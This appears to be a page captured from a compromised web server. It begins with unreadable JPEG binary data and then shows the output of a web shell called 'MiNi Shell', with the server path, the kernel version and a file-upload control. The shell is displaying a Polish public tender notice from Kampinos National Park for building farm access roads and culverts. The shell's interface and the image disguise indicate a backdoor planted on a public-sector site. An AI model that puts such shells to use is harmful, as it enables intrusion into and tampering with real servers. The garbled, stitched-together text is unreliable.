JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250728/0034847001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie dojazdów do użytków rolnych wraz z przepustami na działkach prywatnych w ramach projektu MERLIN finansowanego ze środków UE z programu Horyzont 2020 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Kampinoski Park Narodowy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 145916637</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tetmajera 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Izabelin C</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-080</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dyrekcja@kampinoski-pn.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://kampn.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Kancelarii Prawnej Drembkowski &amp; Wspólnicy sp.k.</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">KRS: 0000689846, NIP: 9512443024, REGON: 368021646,</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Grzybowska 87</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">00-844</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">kancelaria@prawo.gmina.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.prawo.gmina.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dojazdów do użytków rolnych wraz z przepustami na działkach prywatnych w ramach projektu MERLIN finansowanego ze środków UE z programu Horyzont 2020 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5266084c-18dd-4ae1-a36f-6f0812648ddf</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00348470</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00124301/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Wykonanie dojazdów do użytków rolnych i posesji wraz z przepustami oraz udrożnienie meandra w Janówku w ramach projektu MERLIN finansowanego ze środków UE z programu Horyzont 2020</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie realizowane ze środków UE z programu Horyzont 2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-5266084c-18dd-4ae1-a36f-6f0812648ddf <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający będzie komunikował się z Wykonawcami wyłącznie przy użyciu Platformy e-Zamówienia. Adres strony internetowej, na której odbywać się będzie komunikacja elektroniczna, to: Platforma e-Zamówienia: https://ezamowienia.gov.pl Należy pamiętać, że korzystanie z Platformy e-Zamówienia jest bezpłatne. Złożenie oferty następuje wyłącznie przy użyciu tej Platformy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający komunikuje się z Wykonawcami za pośrednictwem Platformy e-Zamówienia lub poczty elektronicznej. Złożenie oferty następuje wyłącznie przy użyciu Platformy. Wykonawca musi posiadać konto „Wykonawca” na Platformie , której szczegółowe zasady użytkowania określa „Regulamin korzystania z Platformy e-Zamówienia”. Przeglądanie i pobieranie publicznej treści dokumentacji nie wymaga konta. Dokumenty elektroniczne muszą być sporządzone zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie. Wymagane formaty danych są określone w Rozporządzeniu Rady Ministrów z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności. Pozostałe informacje, oświadczenia lub dokumenty sporządza się w postaci elektronicznej w formatach danych z Krajowych Ram Interoperacyjności lub jako tekst wpisany bezpośrednio do wiadomości. Korespondencja (poza ofertami) odbywa się przez formularze do komunikacji w zakładce „Formularze” lub e-mail. Formularze te umożliwiają dołączanie załączników. Podpisane kwalifikowanym podpisem elektronicznym dokumenty mogą być opatrzone podpisem zewnętrznym lub wewnętrznym. Pełne korzystanie z formularzy wymaga zalogowania , do zadawania pytań wystarczy konto uproszczone. Maksymalny rozmiar plików przesyłanych przez formularze to 150 MB na jeden formularz. Wszelka korespondencja musi zawierać numer postępowania 5.2025.KPN. Informacje stanowiące tajemnicę przedsiębiorstwa powinny być przekazywane w wydzielonym, odpowiednio oznaczonym pliku z nazwą „Dokument stanowiący tajemnicę przedsiębiorstwa”. Oferta i oświadczenia z art. 125 ust. 1 Pzp sporządza się w formie elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym. Oferta musi być przygotowana z wykorzystaniem formularza Oferty Zamawiającego (załącznik nr 1 do SWZ). System szyfruje złożone pliki. Potwierdzenie czasu przekazania i odbioru oferty znajduje się w Elektronicznym Potwierdzeniu Przesłania (EPP) i Elektronicznym Potwierdzeniu Odebrania (EPO). EPP i EPO są dostępne dla zalogowanego Wykonawcy w zakładce „Oferty/Wnioski”. Oferta może być złożona tylko do upływu terminu składania ofert; oferta złożona po terminie nie zostanie przyjęta. Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB. W przypadku problemów technicznych i awarii Platformy, wsparcie techniczne jest dostępne pod numerem 22 4587799 lub poprzez formularz „Zgłoś problem”. Postępowanie prowadzone jest w języku polskim. Wykonawca jest zobowiązany powiadomić Zamawiającego o każdej zmianie adresu e-mail.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych jest Kampinoski Park Narodowy, ul. Tetmajera 38, 05-080 Izabelin, zgodnie z art. 13 ust. 1 i 2 RODO. Inspektorem Ochrony Danych Osobowych jest osoba, z którą można się skontaktować pod adresem iod@kampinoski-pn.gov.pl. Zamawiający przetwarza dane osobowe w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem. Dane osobowe z art. 10 RODO są udostępniane w celu umożliwienia korzystania ze środków ochrony prawnej (dział IX Pzp) do upływu terminu ich wniesienia. Dopuszczone do przetwarzania takich danych są wyłącznie osoby posiadające upoważnienie i obowiązane do zachowania poufności. Przetwarzanie danych odbywa się na podstawie art. 6 ust. 1 lit. c RODO, w celu prowadzenia postępowania o udzielenie zamówienia publicznego, jego rozstrzygnięcia, zawarcia i realizacji umowy, a także udokumentowania postępowania i jego archiwizacji. Odbiorcami danych osobowych będą podmioty, którym dokumentacja postępowania zostanie udostępniona na podstawie Pzp oraz ustawy o dostępie do informacji publicznej, a także podmioty świadczące usługi doradcze (w tym prawne) i konsultingowe. Dane mogą być przekazywane organom publicznym i urzędom państwowym lub innym podmiotom upoważnionym na podstawie przepisów prawa. Dane osobowe są przekazywane do podmiotów przetwarzających dane w imieniu administratora. Dane osobowe będą przechowywane przez 4 lata od dnia zakończenia postępowania, a jeśli umowa trwa dłużej niż 4 lata, przez cały czas jej trwania. W przypadku zawarcia umowy, dane będą przetwarzane do upływu okresu przedawnienia roszczeń z umowy. Decyzje dotyczące danych osobowych nie będą podejmowane automatycznie. Osoba, której dane dotyczą, ma prawo dostępu do swoich danych (art. 15 RODO) , sprostowania (art. 16 RODO) , żądania ograniczenia przetwarzania (art. 18 ust. 2 RODO) oraz wniesienia skargi do Prezesa UODO. Należy jednak pamiętać, że skorzystanie z tych uprawnień nie może skutkować zmianą wyniku postępowania, postanowień umowy niezgodnie z Pzp, ani naruszać integralności protokołu. Prawo do ograniczenia przetwarzania nie ma zastosowania do przechowywania danych w celu ochrony prawnej lub publicznego interesu. Obowiązek podania danych osobowych jest wymogiem ustawowym Pzp, a konsekwencje niepodania określa Pzp. Osobie, której dane pozyskano, nie przysługuje prawo do usunięcia danych (art. 17 ust. 3 lit. b, d lub e RODO) , prawo do przenoszenia danych (art. 20 RODO), ani prawo sprzeciwu wobec przetwarzania (art. 21 RODO), gdyż podstawą prawną przetwarzania jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W odniesieniu do przetwarzania danych osobowych w postępowaniu o udzielenie zamówienia publicznego, Specyfikacja Warunków Zamówienia (SWZ) wprowadza konkretne ograniczenia w stosowaniu niektórych praw wynikających z RODO. Osobie, której dane osobowe zostały pozyskane w związku z prowadzeniem postępowania, nie przysługuje prawo do usunięcia danych osobowych, co wynika z art. 17 ust. 3 lit. b, d lub e RODO. Nie przysługuje jej również prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, ani prawo sprzeciwu wobec przetwarzania danych osobowych, określone w art. 21 RODO, z uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO. Ponadto, w odniesieniu do prawa dostępu do swoich danych osobowych (art. 15 RODO), w sytuacji, gdy wykonanie obowiązków wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać wskazania dodatkowych informacji mających na celu sprecyzowanie żądania. Prawo do sprostowania swoich danych osobowych (art. 16 RODO) nie może skutkować zmianą wyniku postępowania ani zmianą postanowień umowy w zakresie niezgodnym z Pzp, ani naruszać integralności protokołu oraz jego załączników. Prawo do żądania ograniczenia przetwarzania danych osobowych (art. 18 RODO) nie ma zastosowania do przechowywania danych w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu, a konsekwencje niepodania określonych danych określa Pzp.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">5/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja robót budowlanych polegających na wykonaniu dojazdów technologicznych do użytków rolnych wraz z budową przepustów. Inwestycja zlokalizowana jest na działkach prywatnych w miejscowości Brzozówka, gmina Czosnów, w granicach Kampinoskiego Parku Narodowego. Zakres rzeczowy zamówienia obejmuje między innymi: zdjęcie warstwy humusu, budowę nasypów z mieszanki piaskowo-żwirowej o odpowiednich parametrach zagęszczenia, wykonanie i montaż przepustu rurowego (żelbetowego lub GRP) o długości 10 m i średnicy DN 500 mm, profilowanie i formowanie skarp o nachyleniu 1:2, zagęszczenie gruntu oraz uporządkowanie terenu. Łączna objętość robót ziemnych wynosi około 1000 m 3. Prace muszą być wykonane zgodnie z dokumentacją projektową oraz zasadami wiedzy technicznej, z zachowaniem wymogów ochrony środowiska i przyrody. Inwestycja jest realizowana w ramach projektu MERLIN, finansowanego ze środków Unii Europejskiej z programu Horyzont 2020. Kod CPV dla zamówienia to 45222000-5 (Roboty inżynieryjne i budowlane w zakresie robót wodnych i rurociągowych). Zamawiający nie dokonał podziału zamówienia na części, uzasadniając to koniecznością zapewnienia spójności technicznej i organizacyjnej realizacji robót budowlanych, jednorodnością robót ziemnych i montażowych, realizacją w ramach jednej dokumentacji projektowej i w obrębie jednego obszaru funkcjonalnego, a także koniecznością osiągnięcia kompleksowego efektu ekologiczno-funkcjonalnego w określonym czasie w ramach projektu MERLIN. Podział zamówienia mógłby prowadzić do trudności koordynacyjnych, rozdrobnienia odpowiedzialności, ryzyka opóźnień i zwiększenia kosztów, a także komplikacji formalnych związanych z prowadzeniem prac na gruntach prywatnych. Zamawiający ocenia, że realizacja zamówienia w formule niepodzielonej zapewnia większą efektywność organizacyjną i ekonomiczną oraz lepsze warunki nadzoru inwestorskiego i odbioru robót. W przypadku wskazania w opisie przedmiotu zamówienia jakiegokolwiek znaku towarowego, patentu, pochodzenia lub źródła, należy przyjąć, że określają one minimalne parametry techniczne, eksploatacyjne, użytkowe, co oznacza dopuszczenie złożenia oferty z równoważnymi parametrami. Podobnie, użycie norm, aprobat, specyfikacji technicznych i systemów odniesienia należy rozumieć jako przykładowe, z dopuszczeniem zastosowania rozwiązań równoważnych. Zaoferowany produkt nie może mieć parametrów gorszych niż wskazane w opisie przedmiotu zamówienia. Zamawiający nie zastrzegł obowiązku osobistego wykonania kluczowych części zamówienia przez Wykonawcę, ani nie dopuszcza realizacji całości lub części zamówienia przy udziale Podwykonawców. Wykonawca zobowiązany jest użyć materiałów gwarantujących odpowiednią jakość, o parametrach technicznych i jakościowych odpowiadających właściwościom materiałów przyjętych w projekcie i dopuszczonych do stosowania, zgodnie z ustawą o wyrobach budowlanych. Wykonawca ma obowiązek posiadać dokumenty potwierdzające pozwolenie na zastosowanie w budownictwie dla użytych materiałów i urządzeń, takie jak atesty, certyfikaty, aprobaty techniczne, świadectwa jakości. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45222000-9 - Roboty budowlane w zakresie robót inżynieryjnych, z wyjątkiem mostów, tuneli, szybów i kolei podziemnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona w oparciu o trzy kryteria: cenę (C) z wagą 60%, okres gwarancji jakości na wykonane roboty (G) z wagą 20% oraz doświadczenie kierownika robót (D) z wagą 20%. Ocena będzie dokonywana w stosunku 1% = 1 punkt. Punkty za cenę będą przyznawane według wzoru: <br/> C=(Cmin/Cbad)×60 pkt, gdzie Cmin to najniższa cena spośród wszystkich złożonych ofert, a Cbad to cena oferty badanej. W kryterium okresu gwarancji jakości, Wykonawca zobowiązany jest do udzielenia gwarancji na wykonane roboty budowlane, przy czym minimalny wymagany okres gwarancji to 36 miesięcy. Ocena będzie dokonywana według poniższej skali: dla 60 miesięcy gwarancji przyznawane jest 0 punktów, dla 70 miesięcy – 10 punktów, a dla 80 lub więcej miesięcy – 20 punktów. Okres gwarancji dłuższy niż 80 miesięcy nie będzie dodatkowo punktowany. W kryterium doświadczenia kierownika robót, Wykonawca otrzyma punkty za wykazanie doświadczenia kierownika robót budowlanych przy realizacji inwestycji na terenach objętych ochroną przyrody (parki narodowe, rezerwaty, obszary Natura 2000). Skala punktacji wygląda następująco: za 0 zrealizowanych inwestycji (każda o wartości min. 100 tys. zł brutto) przyznaje się 0 punktów, za 1 inwestycję – 10 punktów, a za 2 lub więcej inwestycji – 20 punktów. Wykonawca zobowiązany jest przedstawić wykaz inwestycji wraz z dokumentami potwierdzającymi ich należyte wykonanie (np. referencje, protokoły odbioru), zawierającymi jednoznaczną informację o lokalizacji inwestycji na terenie objętym ochroną przyrody. Łączna liczba punktów (P) zostanie obliczona poprzez zsumowanie punktów uzyskanych w poszczególnych kryteriach według wzoru: P=C+G+D, gdzie C to punkty za cenę, G to punkty za gwarancję, a D to punkty za doświadczenie kierownika. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą łączną liczbę punktów (maksymalnie 100 punktów).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości na wykonane roboty (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika robót (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu o udzielenie zamówienia mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące zdolności do występowania w obrocie gospodarczym, uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile wynika to z odrębnych przepisów), sytuacji ekonomicznej lub finansowej oraz zdolności technicznej lub zawodowej. Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku zdolności do występowania w obrocie gospodarczym, uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, ani sytuacji ekonomicznej lub finansowej. W zakresie zdolności technicznej lub zawodowej, Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał co najmniej jedno zamówienie, którego przedmiotem była budowa, przebudowa lub remont infrastruktury ziemnej (np. dróg gruntowych, przejazdów, przepustów, nasypów) o wartości co najmniej 100 000,00 zł brutto. Dodatkowo, Wykonawca musi dysponować lub będzie dysponować co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej (lub równoważne) i pełniącą funkcję kierownika robót przy realizacji co najmniej jednej inwestycji w zakresie budowy, przebudowy 